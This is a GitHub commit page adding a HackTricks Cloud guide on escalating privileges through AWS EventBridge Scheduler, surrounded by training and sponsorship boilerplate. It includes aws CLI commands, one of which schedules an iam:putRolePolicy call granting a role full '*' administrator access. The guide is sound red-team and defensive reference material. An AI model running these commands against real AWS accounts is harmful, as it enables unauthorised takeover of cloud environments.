-
Notifications
You must be signed in to change notification settings - Fork 255
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #106 from JaimePolop/patch-7
Create eventbridgescheduler-privesc.md
- Loading branch information
Showing
1 changed file
with
95 additions
and
0 deletions.
There are no files selected for viewing
95 changes: 95 additions & 0 deletions
95
...ing-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,95 @@ | ||
| # AWS - EventBridge Scheduler Privesc | ||
|
|
||
| {% hint style="success" %} | ||
| Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1).png" alt="" data-size="line">\ | ||
| Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte) | ||
|
|
||
| <details> | ||
|
|
||
| <summary>Support HackTricks</summary> | ||
|
|
||
| * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! | ||
| * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** | ||
| * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. | ||
|
|
||
| </details> | ||
| {% endhint %} | ||
|
|
||
| ## EventBridge Scheduler | ||
|
|
||
| EventBridge Scheduler can be used for privilege escalation by scheduling calls to various AWS services. By leveraging its ability to invoke services on a scheduled basis, users with sufficient permissions can escalate privileges. Here are some of the key actions EventBridge Scheduler can trigger using templated targets: | ||
|
|
||
| - Lambda: lambda:InvokeFunction - Invoke Lambda functions on a schedule. | ||
| - CodeBuild: codebuild:StartBuild - Start AWS CodeBuild projects. | ||
| - CodePipeline: codepipeline:StartPipelineExecution - Trigger AWS CodePipeline executions. | ||
| - ECS: ecs:RunTask - Run ECS tasks. | ||
| - EventBridge: events:PutEvents - Put events into EventBridge. | ||
| - Inspector: inspector:StartAssessmentRun - Start Amazon Inspector assessments. | ||
| - Kinesis: kinesis:PutRecord - Put records into Kinesis streams. | ||
| - Firehose: firehose:PutRecord - Put records into Firehose delivery streams. | ||
| - SageMaker: sagemaker:StartPipelineExecution - Start SageMaker pipeline executions. | ||
| - SNS: sns:Publish - Publish messages to SNS topics. | ||
| - SQS: sqs:SendMessage - Send messages to SQS queues. | ||
| - Step Functions: states:StartExecution - Start executions of AWS Step Functions. | ||
|
|
||
| These are just some of the templated actions EventBridge Scheduler can perform. However, by using universal targets, many other actions across AWS services can be invoked. Universal targets allow for more extensive API operations beyond the templated list. | ||
|
|
||
| More info EventBridge Scheduler in: | ||
|
|
||
| {% content-ref url="../aws-services/eventbridgescheduler-enum.md" %} | ||
| [eventbridgescheduler-enum.md](../aws-services/eventbridgescheduler-enum.md) | ||
| {% endcontent-ref %} | ||
|
|
||
| ### `sts:AssumeRole`, `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`) | ||
|
|
||
| Users with `sts:AssumeRole`, `iam:PassRole`, and `scheduler:CreateSchedule or scheduler:UpdateSchedule` permissions can escalate privileges by leveraging the EventBridge Scheduler to invoke services using a role with higher privileges. | ||
|
|
||
| With these permissions, an attacker can assume a role with elevated privileges and pass that role to EventBridge Scheduler when creating or updating a schedule. The schedule can be configured to perform any of the actions listed previously, such as invoking Lambda functions, starting ECS tasks, triggering CodePipeline executions, or any operation of the 270 AWS services supported by EventBridge Scheduler. By scheduling these actions, an attacker could abuse higher privileges to perform unauthorized operations across AWS services. | ||
| \\ | ||
|
|
||
| For example, they could configure the schedule to invoke a Lambda function which is a templated action: | ||
|
|
||
| ```bash | ||
| aws scheduler create-schedule \ | ||
| --name MyLambdaSchedule \ | ||
| --schedule-expression "rate(5 minutes)" \ | ||
| --flexible-time-window "Mode=OFF" \ | ||
| --target '{ | ||
| "Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>", | ||
| "RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>" | ||
| }' | ||
| ``` | ||
|
|
||
| In addition to templated service actions, you can use universal targets in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "AdminAccessPolicy", using a role that has "putRolePolicy" policy: | ||
| ```bash | ||
| aws scheduler create-schedule \ | ||
| --name GrantAdminToTargetRoleSchedule \ | ||
| --schedule-expression "rate(5 minutes)" \ | ||
| --flexible-time-window "Mode=OFF" \ | ||
| --target '{ | ||
| "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", | ||
| "RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy", | ||
| "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" | ||
| }' | ||
| ``` | ||
|
|
||
| ## References | ||
|
|
||
| * [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html) | ||
|
|
||
| * [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html) | ||
|
|
||
| {% hint style="success" %} | ||
| Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1).png" alt="" data-size="line">\ | ||
| Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte) | ||
|
|
||
| <details> | ||
|
|
||
| <summary>Support HackTricks</summary> | ||
|
|
||
| * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! | ||
| * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** | ||
| * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. | ||
|
|
||
| </details> | ||
| {% endhint %} |